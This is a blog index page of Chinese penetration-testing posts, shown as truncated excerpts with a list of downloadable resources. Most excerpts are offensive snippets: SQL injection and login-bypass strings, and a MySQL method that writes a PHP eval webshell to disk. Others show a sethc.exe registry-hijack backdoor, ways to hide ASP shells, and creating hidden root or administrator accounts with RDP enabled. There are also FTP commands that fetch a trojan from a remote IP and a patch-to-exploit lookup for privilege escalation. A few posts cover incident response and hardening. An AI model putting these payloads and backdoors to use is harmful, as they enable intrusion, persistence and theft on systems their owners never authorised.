自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(43)
  • 资源 (47)
  • 收藏
  • 关注

原创 Windows权限维持方案(可过360主动防御)

Windows权限维持方案(可过360主动防御)

2022-04-26 21:48:58 1486 2

原创 PostgreSQL高权限命令执行(CVE-2019-9193)漏洞复现&实战

一、漏洞利用这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令,利用的前提1、需要登录2、需要高权限所以要先弱口令爆破之后,然后查看是否是高权限。这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。先删除你

2022-04-26 19:27:34 2542

原创 Linux 应急响应流程及实战演练

当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。0x01 入侵排查思路一、账号安全基本使用:1、用...

2019-02-03 08:54:28 8634 1

原创 CTF-i春秋网鼎杯第四场部分writeup题目分析

双色块下载题目发现只有一个文件且为gif文件,可以正常打开,且只存在绿色和紫色两个颜色,分布不均匀。先丢到winhexv看一下有没有插入其他文件,确实找到了png头文件。到binwalk分析一下,分离出图片上面写着key,可能下面用得到,继续分析这张图片无异常接着分离一下gif,分离出576张图片,是24² 这两个变量应该是代表0,1了按...

2018-08-31 17:34:08 16789 2

原创 PHP程序的常见漏洞攻击分析

随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。如何通过全局变量进行攻击?PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处...

2018-07-26 15:23:10 8069 1

原创 最全的服务器提权

最全的WEBSHELLc: d: e:..... -------------------------------------------------------------------C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settin...

2018-07-04 15:54:05 4784 1

原创 总结搜索型手工注入的全过程(不同权限下的方法)

首先,简单的判断搜索型注入漏洞存在不存在的办法是先搜索,如果出错,说明90%存在这个漏洞。a%' and 1=1-- 正常a%' and 1=2-- 错误有注入由于网站过滤了 ' 等等的。所以工具不行,要手工了。累人啊~~~判断权限a%' and (select is_member('dbo'))=1--    返回正常则 saa%' and (select is_member('db_owner...

2018-07-04 15:53:22 2242 1

原创 注入技巧收集

SA点数据库分离技术相关SA点数据库分离搞法+语句:注射点不显错,执行下面三条语句页面都返回正常。and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtas...

2018-06-13 12:09:19 1824

原创 知识合集

所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。分享给大家、、 希望对大家有所帮助!asp aspx万能密码1:"or "a"="a2:'.).or.('.a.'='.a 3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='1...

2018-06-13 12:09:00 1607

原创 网站入侵思路

开始找工作了,先总结一点渗透的手段,面试的时候可能用的着,我始终坚信机会是留给有准备的人的,多一份努力,就多一份机遇。稍微写一点渗透的小思路、小技巧,主要讲的是思路,所有不会太详细。注意经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀。欢迎来俺博客玩http://www.cnseay.com(一)针对网站程序,不考虑服务器。一、查找注入,注意数据库...

2018-06-04 16:05:54 4492 5

原创 万能密码

1、asp & aspx "or "a"="a )or(a=a  or 1=1-- a or 1=1--  "or 1=1--  or a=a "or"="a=a or= or=or 1 or 1=1=1 1 or 1=1 or 1=1 OR 1=1%00  "or 1=1%00 xor  用户名 UNION Select 1,1,1 FROM admin Where = (替换表名ad...

2018-06-04 16:05:33 2024

原创 拖库经验

拖库经验技巧集合@mssql:【1】射点导出' and 1=2 union select 1,char(94)+CaSt(Loginname as varchar)+char(94)+CaSt(password as varchar)+char(94)+CaSt(trueName as varchar)+char(94)+CaSt(email as varchar)+char(94)+CaSt(p...

2018-05-18 15:22:32 5982 1

转载 国内找不到的APP,都在这里!

昨天果酱告诉了大家安卓机卡顿的原因,其中提到,安卓手机下载应用最好在谷歌商店下载。那今天果酱又要推荐一个非常不错的安卓应用商店,一个集应用宝与 Google Play 于一身的纯良应用商店——APKPure 。APKPure 页面清爽简洁,没有推送和广告,支持中文,支持国内全部主流应用,支持所有 Google Play 的纯净应用,听起来是不是就觉得超级酷。首先果酱给你们看看APP页面:我们都知道...

2018-05-15 17:45:05 13858 1

原创 图片马合成

cmd下执行: copy x.gif /b + x.txt /a y.gif

2018-05-14 14:21:21 11115

原创 提升asp.dll权限提权方法

1)查看有特权的dll文件: 命令为:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 2)将asp.dll加入系统权限的列表cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\...

2018-05-14 14:20:57 1721

原创 手工注入常用SQL语句

判断数据库类型:                                                                              Access: and (select id from MSysAccessObjects) >0 返回正常说明是accessMSSQL: and (select id from sysobjects) >0 返回正...

2018-05-11 09:24:32 3754

原创 上传Tips

1、上传目录不可执行的时候修改上传文件的名字为./../可写可执行目录/文件名2、判断是远程还是本地过滤的条件查看执行过滤的时间3、绕过本地验证禁用js,本地构造表单4、在上传是遇到无法上传文件时,尝试看一下源码!然后突破5、常见截断符  00 \n  '\0'6、上传页面无提交或上传按钮用javascript:lbtnUpload.click();...

2018-05-11 09:24:10 1509

原创 启动项详解

启动项详解启动项目就是开机的时候系统会在前台或者后台运行的程序。当Windows(操作系统)完成登录过程,进程表中出现了很多的进程!Windows在启动的时候,自动加载了很多程序许多程序的自启动,给我们带来了很多方便,这是不争的事实,但不是每个自启动的程序对我们都有用;更甚者,也许有病毒或木马在自启动行列!其实Windows2000/XP中的自启动文件,除了从以前系统中遗留下来的Autoexec....

2018-05-09 11:14:03 5934

原创 镜像劫持sethc

方法:Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.Creat...

2018-05-09 10:01:17 2434

原创 服务器安全方案 (被入侵后)

服务器安全方案 (被入侵后)一 :分析黑客入侵与放后门过程1.通过网站漏洞进入后提权然后克隆管理员账号2.上传ASP或PHP木马并隐蔽深的目录3,通过入侵C段机器ARP目标主机得到敏感信息4, 社会工程学入侵 (MINCK有本著作《欺骗的艺术》)四.留后门比如远程控制软件,radmin远控软件等系统级后门黑客之门hxdef100(黑客守卫者) 粘贴键后门 administrators万能密码后门 ...

2018-05-09 10:00:45 2210

原创 常用隐藏SHELL方法

第一种:在我们要做手脚的asp文件里加入如下内容<%if request(”action”)=”ok” then%>shell代码插在这里<%end if%>访问的时候在你作手脚的asp文件后面加上?action=ok,即可第二种:在我们要做手脚的asp文件里加入如下内容<%on error resume nextstrFileName = Request.Query...

2018-05-09 10:00:06 2612

原创 常用命令

net share d:\web=e:\web /grant:zk0898,change 控制面版:运行>>>>>>>>>>>:control计算机管理:command  MMC结束XP防火墙进程:net stop sharedaccess查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pa...

2018-05-07 11:43:23 1594

原创 补丁号对应利用工具

KB952004 :MS09-012 PRKB956572 :MS09-012 巴西烤肉KB2393802:MS11-011KB2592799:MS11-080KB2621440:MS12-0203 KB2160329:MS10-048KB970483 :MS09-020  iis6提权(可能是)KB2124261,KB2271195 MS10-065 IIS7提权(可能是) KB977165 :...

2018-05-07 11:42:42 3754 1

原创 win2003server安全配置

win2003server安全配置//卸载不安全组件regsvr32 /u C:\WINDOWS\System32\wshom.ocx                           regsvr32 /u C:\WINDOWS\System32\\shell32.dll//磁盘权限...cacls c:\ /c /g administrators:f system:fcacls d:\ /c...

2018-05-07 11:42:03 239

原创 sqlmap实战

1、实战mssql 判断注入类型 python sqlmap.py -u 注入点 判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1 列举数据库用户 python sqlmap.py -u 注入点 --users -v 0 列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0 查看用户权限 p...

2018-05-06 09:24:56 469

原创 PHP爆绝对路径方法收集

PHP爆绝对路径方法收集1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg:www.xxx.com/news.php?id=149'  2、错误参数值爆路径 说明:将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg:www.xxx.com/researcharchive.php?id=-1 3、Google爆...

2018-05-06 09:24:33 3233

原创 perl提升权限

c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell放到PERL目录下的BIN目中#!/usr/bin/perlbinmode(STDOUT);syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);$_ = $ENV{QUERY_STRING};s/%20/ /ig;s/%2f/\//ig;...

2018-05-06 09:24:11 980

原创 mysql写一句话

1、创建一个表create TABLE a (cmd text NOT NULL);2、插入数据insert INTO a (cmd) VALUES('<?php eval($_POST[hihack]);?>');3、导出一句话select cmd from a into outfile 'C:\AppServ\www\x.php';4、删除表Drop TABLE IF EXISTS...

2018-05-06 09:23:52 1319

原创 linux添加账户命令

方法一:useradd -u 0   -o   -g root   -G root -d /home/keio keio为用户指定空口令时,执行下列形式的命令: # passwd -d keio删除用户# userdel -r keio方法二:如果希望添加一个拥有root权限的账号admin,可参考以下步骤进行,当然,以下的步骤必须有root权限才能运行:Step1 添加一个一般的用户admin。...

2018-05-06 09:22:59 9405

原创 linux日志路径收集

附:收集的一些日志路径 ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ...

2018-05-06 09:22:37 949

原创 lcx使用帮助说明

软件介绍:lcx.exe(端口转发工具)[Usage of Packet Transmit:]  lcx -<listen|tran|slave> <option> [-log logfile][option:]  -listen <ConnectPort> <TransmitPort>  -tran   <ConnectPort> &l...

2018-05-06 09:22:17 483

原创 ipc$入侵

而且在一般情况下,一些功能对管理员来说也是没有必要的。如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。  我们只需要在isql窗口中输入:use mastersp_dropextendedproc ...

2018-05-06 09:21:56 1067

原创 FTP登入错误详解

1、 无法连接到远程服务器。Socket 错误 = #10060。 原因:对方未开FTP或者无法连通   端口错误(默认21)2、530 Sorry, no ANONYMOUS access allowed 原因:帐号密码错误或者拒绝登入 3、Too many users - please try again later. 原因:限制了登入的人数4、530 Not logged in, only ...

2018-05-06 09:21:34 4846

原创 ftp传马命令

ftp传马命令与教程假设我们已经有一个FTP服务器,上面有一个我们配置好的木马文件mhgz.exe,我们应该知道FTP服务器的三个参数:1、FTP服务器的IP地址:如1.1.1.12、FTP服务器的用户名:如test3、FTP服务器的密 码:如test123在远程计算机的C***下依次输入下面的命令:1、echo open 221.202.50.125>>test.txt 登陆FTP服...

2018-05-06 09:21:13 1851

原创 cookie注入

语句: javascript:alert(document.cookie="id="+escape("137 and 1=1")); 

2018-05-04 13:03:43 291

原创 cmd

加账户net user seayace seay /add  建立账户,用户名seayace  密码seaynet localgroup Administrators seayace /add  提升到管理员权限开启3389REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t...

2018-05-04 13:03:17 237

原创 CGI资料整理

总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  以POST的方法发送表格的话,就不能蒙混过关(%00将...

2018-05-04 13:02:56 282

原创 Cgi-bin 30个漏洞+使用方法

==============================/smspass.plusername=username&password=password/index.cgiwei=ren&gen=command/passmaster.cgiAction=Add&Username=Username&Password=Password/accountcreate.cgi...

2018-05-04 13:01:39 11420

原创 ASP FSO

1.FSO生成一句话代码<%Dim Content,Fso,FoutSet Fso=Server.CreateObject("Scripting.FileSystemObject")Set Fout=Fso.CreateTextFile(Server.Mappath("../123.asp")) Fout.WriteLine"<script language=VBScript runa...

2018-05-04 13:00:56 213

原创 adsutil.vbs 的使用

IIS 管理脚本之 adsutil.vbs 的使用  Adsutil.vbs是什么?它是Windows 2003的IIS服务自带的基于命令行下的IIS管理脚本,位于%SystemDrive%\Inetpub\AdminScripts目录下,95,426字节。这么大的脚本一看就知道功能肯定非常强大,事实也确是如此。我感觉它就是个命令行下的“Internet 信息服务管理器”(事实上Windows 2...

2018-05-04 13:00:33 851

Struts2漏洞检查工具

Struts2漏洞检查工具,有需要的可以下载检测,里面比较全,请勿滥用!

2018-06-13

Sublime Text 3.x 破解补丁[build 3176可用]

Sublime Text 3.x 破解补丁[build 3176可用],赠送Sublime Text 3(Build 3083)x86&x64;破解&汉化绿色版,可以进去下载使用,build 3176的是需要用里面破解补丁使用的!SublimeText 是一个代码编辑器,也是HTML和散文先进的文本编辑器. SublimeText 是由程序员 JoSkinner 于2008年1月份所开发出来,它最初被设计为一个具有丰富扩展功能的VimSublimeText具有漂亮的用户界面和强大的功能,例如代码缩略图,Python的插件,代码段等.还可自定义键绑定,菜单和工具栏.SublimeText 的主要功能包括:拼写检查,书签,完整的 Python API , Goto 功能,即时项目切换,多选择,多窗口等等.同时 SublimeText 是一个跨平台的编辑器,同时支持Windows、Linux、Mac OS X等操作系统!

2018-05-18

尚硅谷spring boot 视频,包含上、下,核心技术和整合

尚硅谷spring boot 视频,包含上、下,核心技术和整合!最新出炉,有需求的可以下载看看,有整合!

2018-05-18

WTool (无驱版高级手工杀毒系统修复工具)

Wtool(WT)是一款系统辅助工具,使用本工具可以帮你揪出系统中的病毒和木马,彻底保护您的计算机安全。

2018-05-18

网络安全与CTF在线学习资源

里面整理了各个综合学习平台的网址,和各个比较靠谱的博客网址等等,有安全学习的朋友可以下载看看!

2018-05-18

珍贵的渗透笔记

珍贵的渗透笔记,都是自行整理的一些笔记和记录的一些过程,有需要的可以参考!里面有详细的过程!

2018-05-11

服务器系统加固详细记录

服务器windows系统和linux系统加固详细记录,加固前和加固后的结果都有记录,运维工程师可以根据加固建议值进行服务器加固,有需求的可以下载!

2018-05-09

系统渗透笔记

系统渗透笔记,渗透记录的笔记,有兴趣的可以下载看看,基础!

2018-05-09

各大组织大马默认密码

各大组织大马默认密码,有学习攻防的朋友可以下载参考,渗透的朋友可以下载看看!

2018-05-09

各大机房装机默认密码

各大机房装机默认密码,有运维人员忘记密码的话可以参考一下!

2018-05-09

操作系统加固参考

里面自己梳理了win系统和linux系统的加固方案,详细的加固前加固后命令参考,有做服务器安全的可以参考下!

2018-05-09

Linux系统安全加固手册

Linux系统安全加固手册,可以按照文档方法进行安全加固!

2018-05-07

最全H3C图标库

最全H3C图标库, H3C图标用于绘画网络拓扑图,有需要的可以下载!

2018-05-07

Access和SQLSever注入

Access和SQLSever注入,各位可以参考看看,里面的记录的流程!

2018-05-07

那些年我们绕过的WAF

本文主要是总结了WAF绕过的各种方法,大家在测试中可以使用以下的方法进行WAF的绕过,希望对大家有帮助。

2018-05-07

C#正则表达式的使用

C#正则表达式的使用,希望大家可以学习学习! [C#] bool IsValidEmail(string strIn) { // Return true if strIn is in valid e-mail format. return Regex.IsMatch(strIn, @"^([\w-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([\w-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$"); }

2018-05-06

必知必会正则表达式

正则表达式(regular expression)就是用一个“字符串”来描述一个特征,然后去验证另一个“字符串”是否符合这个特征。 正则表达式可以用来: (1)验证字符串是否符合指定特征,比如验证是否是合法的邮件地址。 (2)用来查找字符串,从一个长的文本中查找符合指定特征的字符串,比查找固定字符串更加灵活方便。(3)用来替换,比普通的替换更强大。

2018-05-06

CTF笔记.one

CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!

2018-05-06

历年软考数据库系统工程师真题及答案

2013-2016年软考数据库系统工程师真题及答案,各位可以参考复习!

2018-05-04

最新702种CGI漏洞

CGI漏洞的利用(一) GI漏洞向来是容易被人们忽视的问题,同时也是普遍存在的 一、phf.cgi攻击: phf是大家所熟悉的了,它本来是用来更新PHONEBOOK的,但是许多管理员对它不了解以至于造成了漏洞。

2018-05-04

从零开始制作一个Web蜜罐扫描器

在渗透的过程中,会遇到很多蜜罐,一旦不小心踩了蜜罐,就会被溯源,所以很可怕。 为了规避上面的现象,就需要把蜜罐筛出来。 使用场景是在前期资产收集的过程中,搞到了一堆子域名,先筛掉一批蜜罐,留下可以攻击的纯净资产。

2022-04-26

网络安全人员角色分类和能力要求框架

合理设置网络安全保障工作的角色分类,明确各角色的能力要求,是充分发挥网络安全 人员作用的关键.本标准提供了网络安全人员角色的分类指南和每个角色的能力要求.网络 运营机构可参照本标准合理设置工作岗位,并依此建立相关录用、考核标准,选择恰当的人 员承担相关工作,最大限度地发挥相关岗位人员的作用。网络安全从业人员可参照本标准对角色能力的要求,结合自身的知识、技能和经历,选择合适的工作角色做好职业规划网络安全培训教育机构可根据本标准开发合理的课程,为接受培训的人员建立良好的工作衔接国家认证认可机构可依据本标准对网络安全从业人员开展能力评价工作,并予以合理的能力认定。 本标准是网络安全从业人员能力认证的基础•为规范实施网络安全人员认证,后续还将进一步开发相关配套标准,包括:网络安全人员认证指南、网络安全人员认证考试大纲、网络安全人员认证能力评价指南等。

2022-04-20

【可参考】渗透测试方案.docx

某公司渗透测试方案,可以参考借鉴。

2022-04-15

某市云计算中心安全体系规划

云计算是基于互联网、通过虚拟化方式共享资源的计算模式,使计算、存储、网络、软件等资源,按照用户的动态需要,以服务的方式提供。云计算是继个人电脑、互联网之后,信息技术的重大革新,为某市提高办公效率、降低单位能耗、提升电子政务的服务能力提供了有力的技术保障手段。 主要包含以下方面: 1、概述 2、某市电子政务云规划 3、政务云面临的安全威胁及挑战 4、政务云安全需求 5、政务云安全保障体系设计 6、云平台安全技术体系详细设计 7、云平台安全组织体系详细设计 8、云平台安全管理体系详细设计 9、安全建设项目设计和规划 10、地市信息安全规划 11、安全建设效益分析

2022-04-14

架构部岗位职级晋升框架&标准

架构部岗位职级晋升框架&标准 晋升职级的考察能力项 架构岗专业知识标准 专业知识库 能力水平描述 助理 初级 中级 高级 资深 专家 高级专家 资深专家

2022-04-13

三级等保评审需要的网络安全管理制度大全汇编

第一章安全策略总纲 1.1、信息安全策略总纲 第二章安全管理机构 2.1、信息安全组织及岗位职责管理规定 2.2、信息安全检查与审计管理制度 第三章人员安全管理 3.1、内部人员信息安全管理规定 3.2、外部人员访问信息安全管理规定 第四章系统建设管理 4.1、定级备案管理规定 4.2、信息安全方案设计管理规定 4.3、产品采购和使用信息安全管理规定 4.4、信息系统自行软件开发管理规定 4.5、信息系统外包软件开发管理规定 4.6、信息系统工程实施安全管理制度 4.7、信息系统测试验收安全管理规定 4.8、信息系统交付安全管理规定 4.9、信息系统等级测评管理规定 4.10、信息系统安全服务商选择管理办法 第五章系统运维管理 5.1、环境安全管理规定 5.2、资产安全管理制度 5.3、介质安全管理制度 5.4、设备安全管理制度 5.5、运行维护和监控管理规定 5.6、网络安全管理制度 5.7、系统安全管理制度 5.8、恶意代码防范管理规定 5.9、密码使用管理制度 5.10、变更管理制度 5.11、备份与恢复管理制度 5.12、安全事件报告和处置管理制度 5.13、应急预案管理制度

2022-04-13

数据安全之数据分类分级系统建设

数据分类分级是管理体系合理规划、数据安全合理管控、人员精力及力度合理利用的基础,是迈向数据安全年精细化管理的重要一步。 介绍数据分类分级系统架构

2022-04-13

信息安全技术体系课件.pptx

信息安全技术体系课件。

2021-12-26

安永安全管理体系ISO27001服务介绍.pptx

安永安全管理体系ISO27001 认证咨询服务介绍

2021-12-26

信息安全管理制度汇编.docx

信息安全管理制度模板,包含各种管理办法、管理制度。

2021-12-26

GDPR_Audit_Program_Enterprise_EN英文版

GDPR Audit Program—Enterprise This workbook contains a suggested list of possible controls, control attributes and test procedures for auditing GDPR implementation and compliance, and should not be used without design review and localization first.

2021-12-26

GDPR_Audit_Program_Enterprise_CN中文版

GDPR 审计程序——企业部分 本手册为审计《一般数据保护条例》(GDPR)的实施及合规性而建议采取的控制、控制属性和测试程序一览表,在设计评审和本地化通过之前该表不得使用。

2021-12-26

ISO27001信息安全管理体系标准(中文版).pdf

ISO 标准——IEC 27001:2005 General This International Standard has been prepared to provide a model for establishing, implementing, operating, monitoring, reviewing, maintaining and improving an Information Security Management System (ISMS). The adoption of an ISMS should be a strategic decision for an organization. The design and implementation of an organization’s ISMS is influenced by their needs and objectives, security requirements, the processes employed and the size and structure of the organization. These and their supporting systems are expected to change over time. It is expected that an ISMS implementation will be scaled in accordance with the needs of the organization, e.g. a simple situation requires a simple ISMS solution. This International Standard can be used in order to assess conformance by interested internal and external parties. 本国际标准的目的是提供建立、实施、运作、监控、评审、维护和改进信息安全管理体系(ISMS)的模型。采用 ISMS 应是一个组织的战略决定。组织 ISMS 的设计和实施受业务需求和目标、安全需求、应用的过程及组织的规模、结构的影响。上述因素和他们的支持系统预计会随事件而变化。希望根据组织的需要去扩充 ISMS 的实施,如,简单的环境是用简单的 ISMS 解决方案。本国际标准可以用于内部、外部评估其符合性。

2021-11-19

Linux应急响应流程及实战演练

Linux应急响应流程及实战演练,有需要的可以仔细阅读,里面的流程很详细,很不错!

2019-02-03

凯撒密码转换器

支持对字母的转换加密,解密,有需要的可以下载使用!

2018-08-31

维吉尼亚密码解密程序

维吉尼亚密码加密--解密程序,可以帮您验证你写的算法是否正确!

2018-08-31

哈工大密码学实验(一)维吉尼亚密码加密解密及破解

哈工大密码学实验一,包括维吉尼亚密码的加密解密及用卡西斯基的破解!有需要的可以参考!

2018-08-31

Ubuntu16.04安装部署solr7

Ubuntu16.04安装部署solr7详细过程,有需要搭建的可以参考!

2018-08-31

oracle中修改用户密码复杂度

(unix中)oracle修改用户密码复杂度的具体例子及操作过程,本例子是为企业做oracle数据库安全时的实际操作过程,包括密码长度,要求字符类型,过期时间,提示过期时间,密码错误次数等等!

2018-07-26

最新Python3.5零基础+高级+完整项目(28周全)培训视频学习资料

最新Python3.5零基础+高级+完整项目(28周全)培训视频学习资料;本资料仅用于学习。 【课程内容】 第1周 开课介绍 python发展介绍 第一个python程序 变量 字符编码与二进制 字符编码的区别与介绍 用户交互程序 if else流程判断 while 循环 while 循环优化版本 for 循环及作业要求 第2周 本节鸡汤 模块初识 pyc是什么 python数据类型 bytes数据类型 列表的使用 元组与购物车程序练习 购物车程序练习实例 字符串常用操作 字典的使用 三级菜单实例 本周作业-购物车优化 第3周 作业 上节内容回顾 集合及其运算 文件读与写详解 心灵鸡汤 文件修改详解 字符编码转换详解 函数与函数式编程 函数式编程之参数详解 局部变量与全局变量作用域 递归 函数式编程与函数不同 高阶函数 第4周 上节内容回顾 心灵鸡汤 装饰器详解 装饰器应用详解 装饰器之函数即变量 装饰器之高阶函数 装饰器之嵌套函数 装饰器之案例剖析 装饰器之高潮讲解 迭代器与生成器 迭代器与生成器并行 内置方法详解 Json与pickle数据序列化 软件目录结构规范 本周作业 第5周 心灵分享 ATM存钱取钱案例剖析 模块定义、导入、优化详解 内置模块详解之time与datetime模块 内置模块详解之Range模块 内置模块详解之OS模块 内置模块详解之Sys模块 内置模块详解之Shelve模块 内置模块详解之Xml模块 内置模块详解之Configparser模块 内置模块详解之Hashlib、Hmac模块 正则表达式Re模块使用详解 第6周 本节小鸡汤(电影分享) 面向对象介绍 面向对象特性介绍 实例演示opp编程好处 实例变量与类变量 类变量的作用及析构函数 类的继承 经典类与新式类的继承顺序 继承实例讲解 多态实例讲解 本节作业之选课系统开发 第7周 心灵分享 上节回顾 静态方法、类方法、属性方法 课堂扯淡 深入讲解类的特殊成员方法__init__等 深入讲解类的特殊成员方法__new__等 反射详解 异常处理TryExcept 网络编程Socket介绍 Socket通信案例消息发送与接收 第8周 上节回顾 Socket实现简单的ssh客户端 Socket实现简单的ssh服务端 积极思考正能量 Socket实现简单的ssh2 Socket粘包 Socket粘包深入编码 SocketServer SocketServer多并发 多用户在线Ftp程序 第9周 上节回顾 paramiko模块详解 ssh密钥讲解 进程与线程 多线程 多线程案例 主线程与子线程 线程锁 线程之信号量 线程之Event 队列Queue 作业之主机批量管理 第10周 心灵分享 上节回顾 多进程 多进程Queue 多进程Pipes与Manager 进程锁与进程池详解 协程 协程Gevent 协程之爬虫 协程之Socket IO多路复用 IO模式 Select解析Socket通信 作业 第11周 鸡汤 消息队列介绍 RabbitMQ基本示例 RabbitMQ消息分发轮询 RabbitMQ消息持久化 RabbitMQ fanout广播模式 RabbitMQ direct广播模式 RabbitMQ topic细致的消息过滤广播模式 Redis string操作 RabbitMQ rpc实现 Redis hash操作 Redis 集合set 和有序集合操作 Redis 集合操作补充 Redis 发布订阅及本节作业 第12周 上节回顾 数据库介绍 mysql基本使用 mysql数据类型与创建表 mysql 增删改查 mysql 外键关联 mysql 连接查询 mysql 事务与索引 mysql python交互 sqlalchemy orm介绍 sqlalchemy 常用语法 sqlalchemy 外键关联 sqlalchemy 多外键关联 sqlalchemy 多对多关联 作业之学员管理系统开发 第13周 堡垒机框架开发介绍 堡垒机源码讲解 堡垒机项目表结构设计与实现 自动创建表对象 权限分组与数据初始化 第14周 开课介绍 前端技术概要 今日内容概要 Html本质以及在web程序中的作用 html的head内标签 html的body内标签之图标、换行及其他 chrome查看html样式基本操作 html的body内标签之input系列 html的body内标签之多行文本及下来框 html的body内标签之超链接 html的body内标签之图片及表格 html的body内标签之表格 html的body内标签之fieldset标签和label标签 上述内容总结 css选择器 css的存在形式及优先级 css边框以及其他常用样式 css之float样式 css之float实现作业实例 css之display样式 css之内外边距 本周作业以及思路 第15周 上节内容答疑 上节内容回顾 CSS内容补充之position CSS内容补充之overflow CSS内容之hover CSS内容之background 初始javaScript javascript代码存在形式 javascript基本预览 javascript字符串操作以及跑马灯实例 javascript数组和字典以及for循环 javascript条件语句 javascript函数的定义 Dom直接选择器 Dom间接选择器 示例之模态对话框 示例之全选和反选以及取消 javascript必须加分号 示例之后台管理左侧菜单 今日内容梳理 本周作业 第16周 上节作业问题答疑 今日内容计划 CSS内容补充以及后台管理页面布局 后台管理页面布局 JavaScript内容回顾 JavaScript函数 JavaScript序列化及转义 开小差之自动登录抽屉并点赞 eval以及时间操作 JavaScript作用域 JavaScript面向对象及原型 Dom选择器以及内容文本操作 Dom样式操作 Dom属性及创建标签 Dom提交表单及其他 Dom事件操作 Dom事件操作补充 Dom绑定时间的另外一种方式 JavaScript 词法分析解析 前端学习方法分享 Sublime Text工具使用介绍 谢幕 第17周 今日内容概要 jQuery 和Dom关系及jQuery版本 jQuery选择器 实例多选反选取消 删选器以及Tab菜单示例 示例:模态编程框 jQuery 样式以及属性操作 示例:TAB切换菜单 jQuery内容操作 点赞以及jQuery css操作 JQuery高度以及位置操作 JQuery 事件绑定的方式 JQuery事件之组织事件的发生 示例:表单验证 JQuery事件之页面框架和加载后自动执行 JQuery扩展以及自动执行函数的应用 JQuery阻止事件发生 JQuery扩展 作业 第18周 内容概要 JS正则详解 JS正则详解之验证 组件BootStrap、EasyUI、JQueryUI 插件轮播 Django_Web框架引入 Django工程创建 Django目录详解 Django创建App Django的Model使用 Django实现用户登录与前端交互 Django路由介绍 Django知识点整理 作业 第19周 今日内容概要 上课内容概要 今日Django工程的创建 Django获取多个数据以及文件上传 Django的CBV和FBV Django模板语言循环字典 Django基于正则表达式的URL Django对应的路由名称 Django路由分发 DjangoORM基本创建基本类型以及生成数据库结构 DjangoORM使用mysql注意 DjangoORM基本增删查该 基于ORM实现用户登录 基于ORM实现用户增加删除修改以及查看详细 Django字段类型介绍 DjangoORM字段参数介绍 DjangoORM外键操作 基于DjangoORM的外键实现增加用户(含select标签) 作业 第20周 课程安排 上课内容回顾 Django一对多的创建 创建一对多表结构 获取单表单数据的三种方式 一对多跨表操作 一对多块表操作的的三种方式 增加一对多数据示例 初识Ajax Ajax内容基本整理 编辑一对多示例 创建多对多以及增加示例 本节内容梳理 本周作业 第21周 今日知识点概要 上节内容回顾以及URL的补充 视图获取用户请求相关信息以及请求头 模板之继承 模板之导入 上节作业情况 自定义 simple_tag 自定义filter 自定义分页 Cookie是什么鬼 基于Cookie实现用户登录 基于cookie实现定制显示数据条数 带签名的Cookie CBV和FBV用户认证装饰器 本周作业 第22周 上节回顾 